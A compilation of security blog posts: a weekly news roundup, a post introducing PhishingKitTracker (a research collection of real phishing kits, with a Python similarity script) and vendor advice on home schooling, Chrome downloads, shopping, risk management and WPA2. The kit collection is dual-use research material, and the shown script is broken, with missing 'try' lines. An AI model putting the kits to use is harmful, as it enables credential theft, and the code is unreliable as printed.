Cybercriminals are always on the hunt for two things: people’s identity data from their accounts and their money. Both can be exposed during the tax-filing season, and cybercriminals have adapted multiple tools and techniques to obtain this information. In this blog, take a look at some of the main threats during tax-filing season and what you can do to stay safe.

Russia is Trying to Hack and Steal Coronavirus Vaccine Data, U.S., Canadian and UK Officials Claim

Officials said that hackers linked to Russian intelligence services are trying to steal information about coronavirus vaccine research in the U.S., Canada and the U.K.  They said that a group known as APT29 — also known as “Cozy Bear” and believed to be associated with Russian intelligence — was likely to blame for the attack, which used spear phishing and custom malware to target vaccine researchers.

Trend Micro and Girls in Tech to Provide Cybersecurity Training to Girls Around the World

Trend Micro recently announced that it is expanding its partnership with non-profit Girls in Tech with a new initiative aimed at closing the gender diversity and talent gap in the technology industry. Together, the organizations will provide cybersecurity training to girls around the world to help develop a large talent pool of women eager to get their start in the industry.

Microsoft Tackles 123 Fixes for July Patch Tuesday

A critical DNS bug and a publicly known elevation-of-privilege flaw top this month’s Patch Tuesday list of 123 fixes. This article includes data from the Trend Micro Zero Day Initiative (ZDI) July Patch Tuesday blog post, which says that this Patch Tuesday “makes five straight months of 110+ CVEs released and brings the total for 2020 up to 742. For comparison, Microsoft released patches for 851 CVEs in all of 2019. At this pace, Microsoft will eclipse that number next month.”

Guidelines Related to Security in Smart Factories (Part 4) NIST SP800 Series

This blog series explains examples of general-purpose guidelines for ICS and OT security and helps readers understand the concepts required for security in smart factories. Based on the NIST CSF that was introduced in Part 3, from the SP800 series which are guidelines with high specificity, Part 4 explains SP800-53, SP800-82, and SP800-171, which are considered to be particularly relevant to general manufacturing industries.

TikTok’s Huge Data Harvesting Prompts U.S. Security Concerns

Security researchers say TikTok’s information collection practices are consistent with Facebook Inc., Google and other U.S. tech companies looking to tailor ads and services to their users. The bigger issue lies in what TikTok does with the intel it gathers. Some groups like the Democratic and Republican national committees and Wells Fargo & Co. have discouraged or banned people from using the app.

Infrastructure as Code: Security Risks and How to Avoid Them

Infrastructure as Code (IaC) is a key DevOps practice that bolsters agile software development. In this report, Trend Micro identifies security risk areas in IaC implementations and the best practices in securing them.

Lost in Translation: Serious Flaws Found in ICS Protocol Gateways

Marco Balduzzi, senior research scientist with Trend Micro, will disclose details of multiple vulnerabilities he and his team discovered in a sampling study of five popular ICS gateway products at Black Hat USA’s virtual event next month. Their findings focus not on the gateways’ software nor the industrial protocols as in previous research, but rather on a lesser-studied function: the protocol translation process that the devices conduct.

Fixing Cloud Migration: What Goes Wrong and Why?

As part of our #LetsTalkCloud series, Trend Micro is sharing some of its deep, in-house expertise on cloud migration through conversations with company experts and folks from the industry. To kick off the series, this blog covers some of the security challenges that solution architects and security engineers face with customers when discussing cloud migrations. Spoiler: these challenges may not be what you expect.

Has your organization experienced security challenges related to cloud migration? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Trend Micro Research Discovers Cybercriminal Turf War on Routers and a Massive Twitter Breach Compromises Some of the World’s Most Prominent Accounts appeared first on .

Introducing PhishingKitTracker

If you are a security researcher or even a passionate about how attackers implement phishing you will find yourself to look for phishing kits. A phishing kit is not a phishing builder, but a real implementation (actually re-implementation) of a third party website built to lure your victim. Initially attackers use a phishing builder to “clone” the original web site but after that they introduce – in the fresh re-generate website – interesting ad-dons such as for example: evasion techniques (in order to evade to phishing detectors), targeted elements (in order to targetize the victims), fast re-directors ( to follows the attack chain into the original web-site or to a relay to try to infect you) and sometimes exploit-kits to try to exploit your browser before letting you go.

Credit: Alen Pavlovic (here)


There are places where you can buy PhishingKits, for example BleepingComputer wrote a great article on that here, but if you want to get them for free in order to study attack schema and Kit-composition you don’t’ find collections for free. So I decided to share my PhishingKit Tracker, updated automatically by my backend engine every day for study and research purposes.

You can find it HERE (PhishingKitTracker github repo)


This repository holds a collection of Phishing Kits used by criminals to steal user information. Almost every file into the raw folder is malicious so I strongly recommend you to neither open these files, nor misuse the code to prank your friends. Playing with these kits may lead to irreversible consequences which may affect anything from personal data to passwords and banking information.

I am not responsible for any damage caused by the malware inside my repository and your negligence in general.

NB: Large File System Hahead

PhishingKitTracker is stored into Git Large File System (git-lfs) due to the big amount of data tracked. You should install git-lfs before cloning this repository.

RAW Data

In raw folder are tracked the Phishing Kits in the original format. No manipulation are involved in that data. A backend script goes over malicious harvested websites (harvesting from common sources) and checks if Phishing Kits are in there. In a positive case (if a PhishingKit is found) the resulting file is downloaded and instantly added to that folder. This folder is tracked by using Git Large File System since many files are bigger than 100MB. The “RAW Data” is a quite unexplored land, you would find many interesting topics with high probability. Please remember to cite that work if you find something from here, it would be very appreciated.


In stats folder are maintained two up-to-date files:

  1. files_name it holds the frequency of the found file-names associate with kits. In other words every phishing kit is saved on the phishing host with a name. filke_name keeps track about every file names and its frequency. If you are wondering why am I not tracking hashes, is because phishing kits are big compressed archives, so it would make no sense at this stage since they always differ each other (but check in src folder for additional information)
  2. sites hols the frequency of the hosting domain names. In other words where the phishing kit was found. No duplicates are tracked by meaning that the frequency and the file names are unique. So for example if you see something like: 3 it means that in have been found three different Phishing Kits over time.

Both of these files have been generate by simple bash scripts like:

  • ls raw/ | cut -d'_' -f1 | uniq -c | sort -bgr > stats/sites.txt
  • ls raw/ | cut -d'_' -f2 | uniq -c | sort -bgr > stats/files_name.txt

these scripts are run on every commit making files inline with the raw folder.

On the other side a file called similarity.csv is provided with a tremendous delay due to the vast amount of time in generating it. That file provides the similarity between the tracked Phishing Kits. It’s a simple CSV file so that you can import it on your favorite spreadsheet and make graphs, statistics or manipulate it in the way you prefer.


The similarity structure is like the following one: FileA,FileB,SimilarityAVG,SimilarityMin,SimilarityMax where:

  • FileA is PhishingKit which is considered in that analysis.
  • FileB is the PhishingKit to be compared to PhishingKit FileA
  • SimilarityAVG is the Average in similarity. That average is calculated by computing the similarity check to every single (interesting) file in the PhishingKit archive (FileA) to every single (interesting) file in the PhishingKit archive to be compared (FileB)
  • SimilarityMin is the lowest similarity value found between PhishingKitA and PhishingKitB
  • SimilarityMax is the highest similarity value found between PhishingKitA and PhishingKitB

If you want to generate similarity.csv by your own I provide a simple and dirty script into the src folder. So far it has several limitations (for example it computes ZIP only files). please make pull requests for improving and empower it. Each contribute would be very helpful.


Please check those variables ( and change them at your will.

EXTENSION_FOR_ANALYSIS = ['.html','.js','.vbs','.xls','.xlsm','.doc','.docm', '.ps1']
OUTPUT_FILE =  'similarity.csv'                                                 
RAW_FOLDER = '/tmp/raw/'                                                        
TEMP_FOLDER = '/tmp/tt'     

Once you’ve changed them you can run the script and take a long rest. It will navigate through the RAW_FOLDER, grab the .zip files and tries to compute code similarity between them. At the very end it will save results into OUTPUT_FILE. From now you can import such a a file into your favorite spreadsheet processor and elaborate the code similarity.

So far the python script is able to only compare zip tracked phishingkit, for different compressed format it’s still work in progress.

NB: The Python script is in a super early stage of development. Please help to improve it.

How to contribute

Introducing the walking script for different compression formats. In other words if you want to contribute you can write a new section such as the following one ( but for different compression extensions such as: .tar.gz, .tar, .rar. /7z and so on and so forth.

# Extracts Zip files based on EXTENSION_FOR_ANALYSIS. It returns the etire file
# path for future works
def extractZipAndReturnsIntereistingFiles(file_to_extract):
    interesting_files = []
    n_interesting_files = []
        with ZipFile(file_to_extract, 'r') as zipObj:
            listOfFileNames = zipObj.namelist()
            for fileName in listOfFileNames:
                for ext in EXTENSION_FOR_ANALYSIS:
                    if fileName.endswith(ext):
                            zipObj.extract(fileName, TEMP_FOLDER)
                            interesting_files.append(os.path.join(TEMP_FOLDER, fileName))
                        except Exception as e:
                        n_interesting_files.append(os.path.join(TEMP_FOLDER, fileName))
    except Exception as e :
        return interesting_files
    return interesting_files

One more way to contribute is to make the comparison loop smarter and quicker. You might decide to parallelized task by forking and spawning more process or by changing the way I use multi-threading in this quick and dirty statistic script. In conclusion every working pull is welcomed.

Cite the Phishing Kit

@misc{ MR,
       author = "Marco Ramilli",
       title = "Phishing Kits Tracker",
       year = "2020",
       url = "",
       note = "[Online; July 2020]"

Data Breach – Understanding the severity of it

A data breach is a security gap in which information or data is accessed or stolen without authorization. It is a breach of trust between the owner of the data and the party that accesses it without consent. To put it in simpler terms it a nonconsensual usage of someone’s…

Poulight- An info-stealing trojan might be teaching you how to play Minecraft

Poulight is an info-stealer trojan which most probably originated in Russia. It is written in the .NET and can collect sensitive information and deliver it to cybercriminals. Ever since its first appearance, it has been growing substantially and taking different forms. The main Infection vector remains spear-phishing emails. It was…

School from Home: “Square One” Basics

 School #FromHome: “Square One” Basics

With many schools around the globe postponing classes for long stretches or closing school outright for the rest of the academic year, the challenge of parenting just cranked up. After all, there’s no more schoolhouse—it’s your house. Whether you’re the parent of a kindergartener or a high school senior, or have a mix of children in between, there’s a good chance you’re trying to figure out how to continue learning online at home—while also dealing with the disappointments of missing friends, activities, and major events like sports, proms, and even graduations. It’s not easy, and without a doubt this is new to all of us.

We want to make it easier for you, even if it’s in some small ways. We started by asking you what roadblocks are getting in the way. This April, we reached out to parents across the U.S. and asked  . Your top two answers came across loud and clear: you’re struggling with establishing a routine and keeping children focused.

Looking for resources and ideas for bringing a little structure into online learning at home and how that fits into your day? We have you covered, so let’s start at square one—making sure that your online learning environment at home is secure.

 Start with a look at your devices

First, determine which device your child is going to use. Some school districts provide students with a laptop that the students keep for the school year. The security on these devices will more than likely be managed centrally by the school district. Thus, they’ll have their own security software and settings already in place. Moreover, such a centrally managed device will likely be limited in terms of which settings can be updated and what software can be added. If your child has a school-issued device, follow the advice of the school and its IT admin on matters of security tools and software. And if you have questions about security, reach out to them.

Security basics on your home computer and laptop

If your child is using a home computer or laptop, or sharing one with other members of the family, you’ll want to ensure that it’s protected. This includes a full security suite that features more than just anti-virus, but also firewall protection to keep hackers at bay, safe browsing tools that steer you clear of sketchy or unsafe websites, and perhaps even parental controls to block distracting apps and inappropriate websites. Another smart option is to use a password manager. There’s a good chance that you kids will need to create new accounts for new learning resources—and with those come new usernames and passwords. A password manager will organize them and keep them safe.

Video conferencing

Additionally, you’ll want to take a very close look at the video conferencing tools that your child might be using to connect with teachers and classmates (and even their friends after schooltime is over). First off, there are plenty of them out there. Secondly, some video conferencing tools have allegedly experienced security and privacy issues in recent weeks. Before downloading and installing a video conferencing tool, do a little online research to see how secure it is and what privacy policies it has in place.

Look for video conferencing tools that use end-to-end encryption so that the conference is protected from prying eyes and so that others can’t intrude upon the conversation uninvited. Look for articles from reputable sources too, as there have been further reports of privacy issues where certain user information has been shared with third parties while using the video conferencing tool. That’s good advice for any software, apps, or tools you may wish to add.

Use a VPN

Another way to protect yourself from intrusions while conferencing, or doing anything else online for that matter, is to introduce a VPN (virtual private network). Choose one that uses bank-level encryption to keep your personal data and activities private from hackers. It will also hide other information, like account credentials, credit card numbers, and the like. It’s a good move, and it’s easy to use.

Next up

Look for our upcoming articles where we’ll share some specific ideas that can help make homeschooling online a little easier.

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.




The post School from Home: “Square One” Basics appeared first on McAfee Blogs.

Protecting users from insecure downloads in Google Chrome

Update (04/06/2020): Chrome was originally scheduled to start user-visible warnings on mixed downloads in Chrome 82. These warnings, as well as subsequent blocking, will be delayed by at least two releases. Console warnings on mixed downloads will begin as scheduled in Chrome 81.

At this time, we expect to start user-visible warnings in Chrome 84. The Chrome Platform Status entry will be kept up-to-date as timing is finalized. Developers who are otherwise able to do so are encouraged to transition to secure downloads as soon as possible to avoid future disruption.

Today we’re announcing that Chrome will gradually ensure that secure (HTTPS) pages only download secure files. In a series of steps outlined below, we’ll start blocking "mixed content downloads" (non-HTTPS downloads started on secure pages). This move follows a plan we announced last year to start blocking all insecure subresources on secure pages.
Insecurely-downloaded files are a risk to users' security and privacy. For instance, insecurely-downloaded programs can be swapped out for malware by attackers, and eavesdroppers can read users' insecurely-downloaded bank statements. To address these risks, we plan to eventually remove support for insecure downloads in Chrome.
As a first step, we are focusing on insecure downloads started on secure pages. These cases are especially concerning because Chrome currently gives no indication to the user that their privacy and security are at risk.
Starting in Chrome 82 (to be released April 2020), Chrome will gradually start warning on, and later blocking, these mixed content downloads. File types that pose the most risk to users (e.g., executables) will be impacted first, with subsequent releases covering more file types. This gradual rollout is designed to mitigate the worst risks quickly, provide developers an opportunity to update sites, and minimize how many warnings Chrome users have to see.
We plan to roll out restrictions on mixed content downloads on desktop platforms (Windows, macOS, Chrome OS and Linux) first. Our plan for desktop platforms is as follows:

  • In Chrome 81 (released March 2020) and later:
    • Chrome will print a console message warning about all mixed content downloads.
  • In Chrome 82 (released April 2020):
    • Chrome will warn on mixed content downloads of executables (e.g. .exe).
  • In Chrome 83 (released June 2020):
    • Chrome will block mixed content executables
    • Chrome will warn on mixed content archives (.zip) and disk images (.iso).
  • In Chrome 84 (released August 2020):
    • Chrome will block mixed content executables, archives and disk images
    • Chrome will warn on all other mixed content downloads except image, audio, video and text formats.
  • In Chrome 85 (released September 2020):
    • Chrome will warn on mixed content downloads of images, audio, video, and text
    • Chrome will block all other mixed content downloads
  • In Chrome 86 (released October 2020) and beyond, Chrome will block all mixed content downloads.
Example of a potential warning
Chrome will delay the rollout for Android and iOS users by one release, starting warnings in Chrome 83. Mobile platforms have better native protection against malicious files, and this delay will give developers a head-start towards updating their sites before impacting mobile users.
Developers can prevent users from ever seeing a download warning by ensuring that downloads only use HTTPS. In the current version of Chrome Canary, or in Chrome 81 once released, developers can activate a warning on all mixed content downloads for testing by enabling the "Treat risky downloads over insecure connections as active mixed content" flag at chrome://flags/#treat-unsafe-downloads-as-active-content.
Enterprise and education customers can disable blocking on a per-site basis via the existing InsecureContentAllowedForUrls policy by adding a pattern matching the page requesting the download.
In the future, we expect to further restrict insecure downloads in Chrome. We encourage developers to fully migrate to HTTPS to avoid future restrictions and fully protect their users. Developers with questions are welcome to email us at

Secure IT: Shop Safe Online

Everything we do on a daily basis has some form of “trust” baked into it. Where you live, what kind of car you drive, where you send your children to school, who you consider good friends, what businesses you purchase from, etc. Trust instills a level of confidence that your risk is minimized and acceptable to you. Why should this philosophy be any different when the entity you need to trust is on the other end of an Internet address? In fact, because you are connecting to an entity that you cannot see or validate, a higher level of scrutiny is required before they earn your trust. What Universal Resource Locator (URL) are you really connecting to? Is it really your banking website or new online shopping website that you are trying for the first time? How can you tell?

It’s a jungle out there. So we’ve put together five ways you can stay safe while you shop online:

  1. Shop at sites you trust. Are you looking at a nationally or globally recognized brand? Do you have detailed insight into what the site looks like? Have you established an account on this site, and is there a history that you can track for when you visit and what you buy? Have you linked the valid URL for the site in your browser? Mistyping a URL in your browser for any site you routinely visit can lead you to a rogue website.

  2. Use secure networks to connect. Just as important as paying attention to what you connect to is to be wary of where you connect from. Your home Wi-Fi network that you trust—okay. An open Wi-Fi at an airport, cyber café, or public kiosk—not okay. If you can’t trust the network, do not enter identifying information or your payment card information. Just ask our cybersecurity services experts to demonstrate how easy it is to compromise an open Wi-Fi network, and you’ll see why we recommend against public Wi-Fi for sensitive transactions.

  3. Perform basic checks in your browser. Today’s modern browsers are much better at encrypted and secure connections than they were a few years ago. They use encrypted communication by leveraging a specific Internet protocol, hypertext transfer protocol secure (HTTPS). This means that there is a certificate associated with this site in your browser that is verified before you are allowed to connect and establish the encrypted channel. (Just so you know, yes, these certificates can be spoofed, but that is a problem for another day). How do you check for this certificate? Look up in your browser title bar.

  4. Create strong password for your shopping sites. This issue is covered in another blog post, but use longer passwords, 10–12 characters, and keep them in a safe place that cannot be compromised by an unauthorized person. If a second factor is offered, use it. Many sites will send you a code to your smartphone to type into a login screen to verify you are who you say you are.

  5. Don’t give out information about yourself that seems unreasonable. If you are being asked for your social security number, think long and hard, and then longer and harder, about why that information should be required. And then don’t do it until you ask a trusted source about why that would be necessary. Be wary of anything you see when you are on a website that does not look familiar or normal.

We all use the Internet to shop. It is super convenient, and the return on investment is awesome. Having that new cool thing purchased in 10 minutes and delivered directly to your door—wow! Can you ever really be 100% sure that the Internet site you are visiting is legitimate, and that you are not going to inadvertently give away sensitive and/or financial information that is actually going directly into a hacker’s data collection file? Unfortunately, no. A lot of today’s scammers are very sophisticated. But as we discussed up front, this is a trust- and risk-based decision, and if you are aware that you could be compromised at any time on the Internet and are keeping your eyes open for things that just don’t look right or familiar, you have a higher probability of a safe online shopping experience.

To recap:

  • Visit and use sites you know and trust
  • Keep the correct URLs in your bookmarks (don’t risk mistyping a URL).
  • Check the certificate to ensure your connection to the site is secured by a legitimate and active certificate.
  • Look for anything that is not familiar to your known experience with the site.
  • If you can, do not save credit card or payment card information on the site. (If you do, you need to be aware that if that site is breached, your payment data is compromised.)
  • Use strong passwords for your shopping site accounts. And use a different password for every site. (No one ring to rule them all!)
  • If a site offers a second factor to authenticate you, use it.
  • Check all your payment card statements regularly to look for rogue purchases.
  • Subscribe to an identity theft protection service if you can. These services will alert you if your identity has been compromised.

Safe shopping!

The post Secure IT: Shop Safe Online appeared first on Connected.

Be a Conscientious Risk Manager

Whether you are a CIO or CISO in the Federal, State or Local, Education, or Commercial Business areas, you are all faced the with same challenge, whether you accept it or not. In the security risk management world, if the malicious actor wants into your network, they will figure out a way to get in. You of course still need to build a comprehensive risk governance and management plan, but that plan must be built on the premise of how you will respond, when the breach occurs.

Having spent 38 years in Information Security, the one constant that I see, is that the individuals who make it their business to steal or disrupt your data, are better funded, better trained, and have unlimited hours to execute their trade. What we hope to achieve is being a half-step behind them at worst case. There is no way to stay in step, and a step ahead is out of the question.

So what does this really mean to the conscientious risk manager. Create a strategy whereby you frequently identify the threat, and measure the risk against that threat in your as-built infrastructure. Test frequently, outside and inside, using he same tools and techniques the malicious actors use. Test user security awareness, as we know it only takes one click of a phishing email malicious link, to potentially bring down and entire enterprise. Measure, document, prioritize, and build a risk roadmap strategy to keep risk mitigation focus on those most critical exploitable areas.

Three Top Security Imperatives
Keep in mind that your top three security imperatives are: Reducing your threat exposure, enhancing your response and recovery times, and increasing security visibility. What does security visibility mean, implementing the people, process, and technology in key security areas, to give you a fighting chance to detect, and react to malicious and advanced persistent threats.

Let’s talk people, process, and technology. We all know users are the weakest link in any security chain. Not because they have sinister intent, although sometimes they do, but primarily because in today’s high-powered technical, mobile, and social world, it is commonplace for a lapse in judgment to occur. We live in a rapid–fire, high-availability, high-output world, and mistakes can and will be made. So make is less commonplace, train and educate often, and monitor closely for when that lapse in judgment occurs.

Process: Again our high-powered technical, mobile, and social world often demands we run at warp speed.  Who has time to document? Well — make the time.  Good documentation to include process, policies and standards, as well as a documented and managed configuration control process, will help keep you more secure. Every process, policy and standard document has to have an assigned owner, has to have a designated review date, and has to have an oversight or governance process. All roles and responsibilities need to be included in the documentation, and the expected outcome needs to be defined. Make the time to prepare and socialize your critical information security program documentation.

Technology: Many risk owners fall prey to purchasing every piece of security technology available, at what I like to call the security “choke points”, end-point, network, edge, gateway, etc. This is just what everyone does. However, why not use the process we discussed above — measure, document, prioritize, and build a risk roadmap strategy — as your guideline for what you purchase and deploy for technology. Ask yourself — what is so wrong with selecting and implementing a product, only after you validate how it will help you manage your documented security risk? Of course the answer to that is — nothing.

Focus on Seamless Collaboration
You have documented your risk, you have prioritized your risk roadmap, and as a result you know the very specific technology, or set of technologies, you need to implement first. Most importantly, your technology selections should focus on products that collaborate in a seamless way. In other words, your end-point, edge, network, gateway, sandbox, etc., security technologies all talk to each other. We call this approach to complete security visibility across the whole landscape, Unified Security Stack. And, don’t forget that all technology must have a people and process component as well.

Good information security risk management and risk governance does not come by accident.  It takes planning and execution. In the end, although you may not keep the bad guy out, you will be better prepared for when.

The post Be a Conscientious Risk Manager appeared first on Connected.

Protecting Critical Infrastructure from Cyber Threats

The basic infrastructure that supports our daily lives is deeply dependent on the Internet, and, therefore, continually exposed to the risk of new threats and cyber attacks. As security breaches grow in frequency and sophistication every day, it’s crucial to build resiliency and then take steps to protect critical infrastructure to remain safe and secure online.

It’s important to identify current and future strategies to protect your infrastructure and manage your risk. Cyber security is one of the biggest challenges organizations face today. Regardless of size or industry, every organization must ask themselves, is my security strategy up to date? If your organization is looking to stay on the front line of cyber security, it’s imperative to know how an end-to-end risk management strategy can help you properly secure your infrastructure.

Our security experts have an abundance of experience, and several areas of expertise we can put to work for you. We are committed to keeping your organization safe and secure, and can help design, deploy, and support solutions to address your critical risks and defend your critical infrastructure. For more information, contact one of our security experts today!

The post Protecting Critical Infrastructure from Cyber Threats appeared first on Connected.

Protecting Critical Infrastructure

In this blog, the focus is on protecting critical infrastructure—the essential systems that support our daily lives such as the electric grid, financial institutions, and transportation. Unfortunately, attacks on critical infrastructure have become a concern worldwide. A devastating attack isn’t just a theoretical possibility anymore. As we’ve recently seen with Equifax, and other security breaches in healthcare and other industries, the growing threat of serious attacks on critical infrastructure is real. These days, hackers have become much more formidable, and we will undoubtedly see more of these attacks in the future. It’s no longer a matter of if there will be another attack, but when.

Protecting your infrastructure requires constant vigilance and attention to evolving cyber attacks. Risk is inherent in everything we do, so trying to stay ahead of the cyber security curve is key. Our team of security experts can help you build a security strategy to detect, protect, and react to the complete threat lifecycle. The threats we all need to manage today evolve quickly, and we can help you minimize your risk and maximize your defenses to improve your cyber resiliency.

The post Protecting Critical Infrastructure appeared first on Connected.

The Internet Wants YOU: Consider a Career in Cyber Security.

With the continuous state of change in the global threat landscape, organizations face cyber attacks and security breaches that are growing in frequency and sophistication every day. But now, consider this: according to a study by the Center for Cyber Safety and Education, there will be a shortage of 1.8 million information security workers by 2022. This gap should be of great concern to organizations.

Skilled people make the difference in protecting sensitive data, so it’s more critical than ever that organizations begin to attract and retain the cybersecurity talent needed to defend against the evolving threat landscape. At Connection, we help inspire individuals coming out of universities to engage in co-op or intern-related opportunities, and I strongly encourage other organizations to see what they can do to help young people today who are really interested in building their skills in this area.

The figures don’t lie. The demand for cyber security will only continue to grow. Through local collaborative efforts between employers, training providers, and community leaders, we can ensure individuals have the opportunity to build on their tech knowledge and participate in a secure, thriving economy.

The post The Internet Wants YOU: Consider a Career in Cyber Security. appeared first on Connected.

Cyber Security Careers Are in High Demand

It’s impossible to overstate the importance of security in today’s digital world. Cyber attacks are growing in frequency and sophistication every day, and a key risk to our economy and security is the lack of professionals to protect our growing networks. According to a study by the Center for Cyber Safety and Education, by 2022, there will be a shortage of 1.8 million information security workers. So, it’s critical that that we begin now to prepare our students—and any others who are interested in making a career move—to fill these gaps. Many colleges and universities have developed information assurance programs that help technical, security-minded students achieve a great foundation in this industry. We also challenge corporations to offer intern and co-op opportunities for students in these degree programs, so they can see what security looks like in practical, business-world applications.

Connection is committed to promoting cyber security and online safety.  Cyber security is a viable and rewarding profession and we encourage people from all backgrounds to see information security as an essential career path.

Read this next:

The post Cyber Security Careers Are in High Demand appeared first on Connected.

WPA2 Hacks and You

The world has been rocked once again with a serious flaw in a basic security mechanism that we all take for granted to keep us safe and secure. According to Dark Reading, researchers at Belgium’s University of Leuven have uncovered as many as 10 critical vulnerabilities in the Wi-Fi Protected Access II (WPA2) protocol used to secure Wi-Fi networks. This is a protocol that—as we have all learned over the last several years—must be configured to keep us safe.

The key reinstallation attack—or KRACKs—impacts all modern wireless networks using the WPA2 protocol. The flaw gives attackers the ability to decrypt data packets that make all private (encrypted) communication no longer private. Although the flaw requires the attacker to have close proximity to the network to execute, this is especially bad news for those with far-reaching wireless signals—such as hotel and hospital lobbies—where an attacker can just sit down and work their trade.

The Vulnerability Notes Database provides a summary and detailed description of the vulnerabilities. It includes a list of vendors who may be affected by the vulnerability, and a status field indicating whether the vendor has any products that are affected.

What can you do?

Vendors are currently identifying their affected products and working on patches to address this attack. In the meantime, here are a few things you can do to keep your information safe:

  1. Apply patches as they are released
  2. Pay careful attention to your wireless environment
  3. Watch for people and technology that look out of place
  4. Utilize a trusted VPN solution
  5. When possible, transfer data over an encrypted channel—such as HTTPS
  6. Restrict sensitive information that would normally pass over a wireless network
  7. And, as always, it’s a good practice to monitor access logs and wireless traffic to look for anomalies in standard business communication

How has this WiFi vulnerability affected your organization? Leave a comment bellow to share your experience and any additional advice you have for staying protected.

Read this next:


The post WPA2 Hacks and You appeared first on Connected.